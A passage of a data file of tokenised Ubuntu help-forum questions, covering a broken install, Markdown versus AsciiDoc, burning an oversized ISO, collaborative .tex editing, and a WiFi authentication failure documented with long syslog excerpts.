so , uh , are there any other methods of installing ubuntu on a broken ubuntu ? should i just buy a new computer ? i 'm stuck and lost and do n't know what to do .
342624	what advantages does markdown have over asciidoc ?	i 've been using asciidoc ever since i discovered it and use it a lot to be my defacto readme text file . it 's readable in text and it can output all kinds of other formats , like man pages , pdf , html , etc . lately i 've been seeing more and more floss projects using markdown . it 's slick as far as i can tell , but it still feels far more limited then asciidoc . even github seems to support .md better then asciidoc . am i missing something ? is there a reason so many people are using .md ? i would think the portability of asciidoc and one text file to bind them all makes it much more powerful . if anyone has any insights , or can tell my why markdown ( md ) is so amazing , i 'll buy you a virtual beer .
342625	how can i burn a 706mb image onto a 703mb cd ?	the ubuntu image ubuntu-12.04.3-alternate-i386.iso is 706mb large . i thought that little 3mb extra at the end is just the mb/mib error - so the image should fit on the disk . but i was wrong . my disk has 703mb . is there a trick to burn the image regardless ?
342631	plain text editor that supports shared file editing like in libreoffice	i want to share a .tex file with another person for us to edit it together , i took a look over collaborative editing in gedit , that is awesome . although it still lacks an important feature for me , that is : when one user edit something it stay marked with different color until the other accept the edition , and when one user delete something it is n't instantly deleted until the other user accept so . editing a file simultaneously does n't matter for me , but recording one user 's editing and only applying it after the other accepts do . this feature is present in libreoffice , i took a screenshot : it is in portuguese , but what matters is that black text is text that was already accepted from both users , blue marked text is text i wrote , but the other user still did n't accept and yellow marked is text that the other user wrote but i did n't accept yet . then i can right click on the text and select to accept the suggestion and the marked text will turn black normal text . ( blue strikeout text is text i deleted and the other user did n't accept yet ) this is a key feature for me . i need to edit a .tex file this way , can be with sublime , gedit , geany , kile , etc . i prefer gedit , geany or kile although any plain text editor that has this feature will be welcome . if this feature simply does n't exist in plain text editors then i can edit the .tex files through libreoffice , but i do n't want to do it .
342637	wifi connect problem	this is a problem in 13.04 and it 's a problem with the wifi . ubuntu will never connect to the network . all of my other devices work fine . the computer detects the network and pops up the wifi password dialog . i enter the correct password , click ok and it tries to connect for a few seconds and then asks for the password again . i am using a new d-link wireless n 150 pico usb adapter which works fine under windows to connect to the same network . i searched google for a few hours and did n't find an answer , maybe someone here could help ? syslog contains : sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : get_secret_flags : assertion `is_secret_prop ( setting , secret_name , error ) ' failed sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0/wireless ) : connection 'wi-fi connection 1 ' has security , and secrets exist . no new secrets needed . sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > config : added 'ssid ' value 'kaylag2' sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > config : added 'scan_ssid ' value '1' sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > config : added 'psk ' value ' < omitted > ' sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > config : set interface ap_scan to 1 sep 7 09:25:40 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning sep 7 09:25:41 mike-ubuntu wpa_supplicant [ 1017 ] : wlan0 : sme : trying to authenticate with 00:13:10 : e1 : f9 : a2 ( ssid='kaylag2 ' freq=2437 mhz ) sep 7 09:25:41 mike-ubuntu kernel : [ 1277.665268 ] wlan0 : authenticate with 00:13:10 : e1 : f9 : a2 sep 7 09:25:41 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating sep 7 09:25:41 mike-ubuntu kernel : [ 1277.681287 ] wlan0 : send auth to 00:13:10 : e1 : f9 : a2 ( try 1/3 ) sep 7 09:25:41 mike-ubuntu wpa_supplicant [ 1017 ] : wlan0 : trying to associate with 00:13:10 : e1 : f9 : a2 ( ssid='kaylag2 ' freq=2437 mhz ) sep 7 09:25:41 mike-ubuntu kernel : [ 1277.686768 ] wlan0 : authenticated sep 7 09:25:41 mike-ubuntu kernel : [ 1277.687005 ] rtl8192cu 1-1:1.0 wlan0 : disabling ht/vht due to wep/tkip use sep 7 09:25:41 mike-ubuntu kernel : [ 1277.687010 ] rtl8192cu 1-1:1.0 wlan0 : disabling ht as wmm/qos is not supported by the ap sep 7 09:25:41 mike-ubuntu kernel : [ 1277.687014 ] rtl8192cu 1-1:1.0 wlan0 : disabling vht as wmm/qos is not supported by the ap sep 7 09:25:41 mike-ubuntu kernel : [ 1277.688037 ] wlan0 : associate with 00:13:10 : e1 : f9 : a2 ( try 1/3 ) sep 7 09:25:41 mike-ubuntu wpa_supplicant [ 1017 ] : wlan0 : associated with 00:13:10 : e1 : f9 : a2 sep 7 09:25:41 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associated sep 7 09:25:41 mike-ubuntu kernel : [ 1277.691496 ] wlan0 : rx assocresp from 00:13:10 : e1 : f9 : a2 ( capab=0x431 status=0 aid=12 ) sep 7 09:25:41 mike-ubuntu kernel : [ 1277.691541 ] wlan0 : associated sep 7 09:25:41 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake sep 7 09:25:51 mike-ubuntu wpa_supplicant [ 1017 ] : wlan0 : authentication with 00:13:10 : e1 : f9 : a2 timed out . sep 7 09:25:51 mike-ubuntu kernel : [ 1287.695734 ] wlan0 : disassociating from 00:13:10 : e1 : f9 : a2 by local choice ( reason=3 ) sep 7 09:25:51 mike-ubuntu wpa_supplicant [ 1017 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 sep 7 09:25:51 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > disconnected sep 7 09:25:51 mike-ubuntu networkmanager [ 986 ] : < info > activation ( wlan0/wireless ) : disconnected during association , asking for new key . sep 7 09:25:51 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'supplicant-disconnect ' ) [ 50 60 8 ] sep 7 09:25:51 mike-ubuntu kernel : [ 1287.711433 ] wlan0 : deauthenticating from 00:13:10 : e1 : f9 : a2 by local choice ( reason=3 ) sep 7 09:25:51 mike-ubuntu kernel : [ 1287.712868 ] cfg80211 : calling crda to update world regulatory domain sep 7 09:25:51 mike-ubuntu kernel : [ 1287.783416 ] cfg80211 : world regulatory domain updated : sep 7 09:25:51 mike-ubuntu kernel : [ 1287.783432 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) sep 7 09:25:51 mike-ubuntu kernel : [ 1287.783439 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 09:25:51 mike-ubuntu kernel : [ 1287.783445 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 09:25:51 mike-ubuntu kernel : [ 1287.783450 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 09:25:51 mike-ubuntu kernel : [ 1287.783456 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 09:25:51 mike-ubuntu kernel : [ 1287.783461 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 09:25:52 mike-ubuntu networkmanager [ 986 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > inactive sep 7 09:26:12 mike-ubuntu kernel : [ 1308.420423 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 7 09:26:12 mike-ubuntu kernel : [ 1308.422269 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 7 09:26:12 mike-ubuntu kernel : [ 1308.422282 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through i tried to disable wpa on the router and it still does n't connect , i 'm just trying to narrow down the issue . sudo lshw -c network *-network description : wireless interface physical id : 1 bus info : usb @ 1:1 logical name : wlan0 serial : 14 : d6:4d : a7:0d:2e capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.8.0-19-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn syslog after this : sudo iw wlan0 set power_save off sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) starting connection 'wi-fi connection 1' sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0/wireless ) : access point 'wi-fi connection 1 ' has security , but secrets are required . sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0/wireless ) : connection 'wi-fi connection 1 ' has security , and secrets exist . no new secrets needed . sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > config : added 'ssid ' value 'kaylag2' sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > config : added 'scan_ssid ' value '1' sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > config : added 'psk ' value ' < omitted > ' sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > config : set interface ap_scan to 1 sep 7 11:59:52 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning sep 7 11:59:53 mike-ubuntu wpa_supplicant [ 1193 ] : wlan0 : sme : trying to authenticate with 00:13:10 : e1 : f9 : a2 ( ssid='kaylag2 ' freq=2437 mhz ) sep 7 11:59:53 mike-ubuntu kernel : [ 1331.829097 ] wlan0 : authenticate with 00:13:10 : e1 : f9 : a2 sep 7 11:59:53 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating sep 7 11:59:53 mike-ubuntu kernel : [ 1331.844435 ] wlan0 : send auth to 00:13:10 : e1 : f9 : a2 ( try 1/3 ) sep 7 11:59:53 mike-ubuntu kernel : [ 1332.048053 ] wlan0 : send auth to 00:13:10 : e1 : f9 : a2 ( try 2/3 ) sep 7 11:59:53 mike-ubuntu kernel : [ 1332.051835 ] wlan0 : authenticated sep 7 11:59:53 mike-ubuntu kernel : [ 1332.052717 ] rtl8192cu 1-1:1.0 wlan0 : disabling ht/vht due to wep/tkip use sep 7 11:59:53 mike-ubuntu kernel : [ 1332.052779 ] rtl8192cu 1-1:1.0 wlan0 : disabling ht as wmm/qos is not supported by the ap sep 7 11:59:53 mike-ubuntu kernel : [ 1332.052786 ] rtl8192cu 1-1:1.0 wlan0 : disabling vht as wmm/qos is not supported by the ap sep 7 11:59:53 mike-ubuntu wpa_supplicant [ 1193 ] : wlan0 : trying to associate with 00:13:10 : e1 : f9 : a2 ( ssid='kaylag2 ' freq=2437 mhz ) sep 7 11:59:53 mike-ubuntu kernel : [ 1332.056098 ] wlan0 : associate with 00:13:10 : e1 : f9 : a2 ( try 1/3 ) sep 7 11:59:53 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating sep 7 11:59:53 mike-ubuntu wpa_supplicant [ 1193 ] : wlan0 : associated with 00:13:10 : e1 : f9 : a2 sep 7 11:59:53 mike-ubuntu kernel : [ 1332.089970 ] wlan0 : rx assocresp from 00:13:10 : e1 : f9 : a2 ( capab=0x431 status=0 aid=12 ) sep 7 11:59:53 mike-ubuntu kernel : [ 1332.090161 ] wlan0 : associated sep 7 11:59:53 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : supplicant interface state : associating - > 4-way handshake sep 7 12:00:03 mike-ubuntu wpa_supplicant [ 1193 ] : wlan0 : authentication with 00:13:10 : e1 : f9 : a2 timed out . sep 7 12:00:03 mike-ubuntu kernel : [ 1342.094561 ] wlan0 : disassociating from 00:13:10 : e1 : f9 : a2 by local choice ( reason=3 ) sep 7 12:00:03 mike-ubuntu wpa_supplicant [ 1193 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 sep 7 12:00:03 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > disconnected sep 7 12:00:03 mike-ubuntu networkmanager [ 969 ] : < info > activation ( wlan0/wireless ) : disconnected during association , asking for new key . sep 7 12:00:03 mike-ubuntu networkmanager [ 969 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'supplicant-disconnect ' ) [ 50 60 8 ] sep 7 12:00:03 mike-ubuntu kernel : [ 1342.106375 ] wlan0 : deauthenticating from 00:13:10 : e1 : f9 : a2 by local choice ( reason=3 ) sep 7 12:00:03 mike-ubuntu kernel : [ 1342.112407 ] cfg80211 : calling crda to update world regulatory domain sep 7 12:00:03 mike-ubuntu kernel : [ 1342.164006 ] cfg80211 : world regulatory domain updated : sep 7 12:00:03 mike-ubuntu kernel : [ 1342.164102 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) sep 7 12:00:03 mike-ubuntu kernel : [ 1342.164109 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:00:03 mike-ubuntu kernel : [ 1342.164116 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:00:03 mike-ubuntu kernel : [ 1342.164121 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:00:03 mike-ubuntu kernel : [ 1342.164127 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:00:03 mike-ubuntu kernel : [ 1342.164132 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) ok , to try to narrow down the issue i thought it might be that the signal might be too weak so i moved the access point closer , i also disabled the security and tried to connect again and still no luck . i 'm not sure if there is anything that stands out in here : sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) starting connection 'kaylag2' sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0/wireless ) : connection 'kaylag2 ' requires no security . no secrets needed . sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > config : added 'ssid ' value 'kaylag2' sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > config : added 'scan_ssid ' value '1' sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > config : added 'key_mgmt ' value 'none' sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > config : set interface ap_scan to 1 sep 7 12:27:36 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > scanning sep 7 12:27:37 mike-ubuntu wpa_supplicant [ 906 ] : wlan0 : sme : trying to authenticate with 00:13:10 : e1 : f9 : a2 ( ssid='kaylag2 ' freq=2437 mhz ) sep 7 12:27:37 mike-ubuntu kernel : [ 115.581772 ] wlan0 : authenticate with 00:13:10 : e1 : f9 : a2 sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > authenticating sep 7 12:27:37 mike-ubuntu kernel : [ 115.620391 ] wlan0 : send auth to 00:13:10 : e1 : f9 : a2 ( try 1/3 ) sep 7 12:27:37 mike-ubuntu wpa_supplicant [ 906 ] : wlan0 : trying to associate with 00:13:10 : e1 : f9 : a2 ( ssid='kaylag2 ' freq=2437 mhz ) sep 7 12:27:37 mike-ubuntu kernel : [ 115.630642 ] wlan0 : authenticated sep 7 12:27:37 mike-ubuntu kernel : [ 115.631154 ] rtl8192cu 1-1:1.0 wlan0 : disabling ht as wmm/qos is not supported by the ap sep 7 12:27:37 mike-ubuntu kernel : [ 115.631164 ] rtl8192cu 1-1:1.0 wlan0 : disabling vht as wmm/qos is not supported by the ap sep 7 12:27:37 mike-ubuntu kernel : [ 115.632450 ] wlan0 : associate with 00:13:10 : e1 : f9 : a2 ( try 1/3 ) sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating sep 7 12:27:37 mike-ubuntu wpa_supplicant [ 906 ] : wlan0 : associated with 00:13:10 : e1 : f9 : a2 sep 7 12:27:37 mike-ubuntu wpa_supplicant [ 906 ] : wlan0 : ctrl-event-connected - connection to 00:13:10 : e1 : f9 : a2 completed ( auth ) [ id=0 id_str= ] sep 7 12:27:37 mike-ubuntu kernel : [ 115.642953 ] wlan0 : rx assocresp from 00:13:10 : e1 : f9 : a2 ( capab=0x421 status=0 aid=4 ) sep 7 12:27:37 mike-ubuntu kernel : [ 115.643075 ] wlan0 : associated sep 7 12:27:37 mike-ubuntu kernel : [ 115.643160 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : supplicant interface state : associating - > completed sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'kaylag2 ' . sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > dhclient started with pid 2201 sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . sep 7 12:27:37 mike-ubuntu dhclient : internet systems consortium dhcp client 4.2.4 sep 7 12:27:37 mike-ubuntu dhclient : copyright 2004-2012 internet systems consortium . sep 7 12:27:37 mike-ubuntu dhclient : all rights reserved . sep 7 12:27:37 mike-ubuntu dhclient : for info , please visit https : //www.isc.org/software/dhcp/ sep 7 12:27:37 mike-ubuntu dhclient : sep 7 12:27:37 mike-ubuntu dhclient : listening on lpf/wlan0/14 : d6:4d : a7:0d:2e sep 7 12:27:37 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit sep 7 12:27:37 mike-ubuntu dhclient : sending on lpf/wlan0/14 : d6:4d : a7:0d:2e sep 7 12:27:37 mike-ubuntu dhclient : sending on socket/fallback sep 7 12:27:37 mike-ubuntu dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 ( xid=0x2a921615 ) sep 7 12:27:39 mike-ubuntu avahi-daemon [ 864 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :16d6:4dff : fea7 : d2e . sep 7 12:27:39 mike-ubuntu avahi-daemon [ 864 ] : new relevant interface wlan0.ipv6 for mdns . sep 7 12:27:39 mike-ubuntu avahi-daemon [ 864 ] : registering new address record for fe80 : :16d6:4dff : fea7 : d2e on wlan0.* . sep 7 12:27:40 mike-ubuntu dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 4 ( xid=0x2a921615 ) sep 7 12:27:44 mike-ubuntu dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 ( xid=0x2a921615 ) sep 7 12:27:54 mike-ubuntu dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 ( xid=0x2a921615 ) sep 7 12:27:57 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . sep 7 12:27:57 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... sep 7 12:27:57 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... sep 7 12:27:57 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . sep 7 12:28:04 mike-ubuntu dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 ( xid=0x2a921615 ) sep 7 12:28:14 mike-ubuntu dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 15 ( xid=0x2a921615 ) sep 7 12:28:20 mike-ubuntu kernel : [ 158.449728 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled sep 7 12:28:20 mike-ubuntu kernel : [ 158.451338 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed sep 7 12:28:20 mike-ubuntu kernel : [ 158.451348 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < warn > ( wlan0 ) : dhcpv4 request timed out . sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 2201 sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < warn > activation ( wlan0 ) failed for connection 'kaylag2' sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] sep 7 12:28:22 mike-ubuntu avahi-daemon [ 864 ] : withdrawing address record for fe80 : :16d6:4dff : fea7 : d2e on wlan0 . sep 7 12:28:22 mike-ubuntu avahi-daemon [ 864 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :16d6:4dff : fea7 : d2e . sep 7 12:28:22 mike-ubuntu avahi-daemon [ 864 ] : interface wlan0.ipv6 no longer relevant for mdns . sep 7 12:28:22 mike-ubuntu kernel : [ 161.024993 ] wlan0 : deauthenticating from 00:13:10 : e1 : f9 : a2 by local choice ( reason=3 ) sep 7 12:28:22 mike-ubuntu wpa_supplicant [ 906 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 sep 7 12:28:22 mike-ubuntu kernel : [ 161.040777 ] cfg80211 : calling crda to update world regulatory domain sep 7 12:28:22 mike-ubuntu networkmanager [ 868 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected sep 7 12:28:22 mike-ubuntu kernel : [ 161.132211 ] cfg80211 : world regulatory domain updated : sep 7 12:28:22 mike-ubuntu kernel : [ 161.132227 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) sep 7 12:28:22 mike-ubuntu kernel : [ 161.132231 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:28:22 mike-ubuntu kernel : [ 161.132234 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:28:22 mike-ubuntu kernel : [ 161.132237 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:28:22 mike-ubuntu kernel : [ 161.132239 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:28:22 mike-ubuntu kernel : [ 161.132242 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) sep 7 12:28:23 mike-ubuntu avahi-daemon [ 864 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :16d6:4dff : fea7 : d2e . sep 7 12:28:23 mike-ubuntu avahi-daemon [ 864 ] : new relevant interface wlan0.ipv6 for mdns . sep 7 12:28:23 mike-ubuntu avahi-daemon [ 864 ] : registering new address record for fe80 : :16d6:4dff : fea7 : d2e on wlan0 . * .
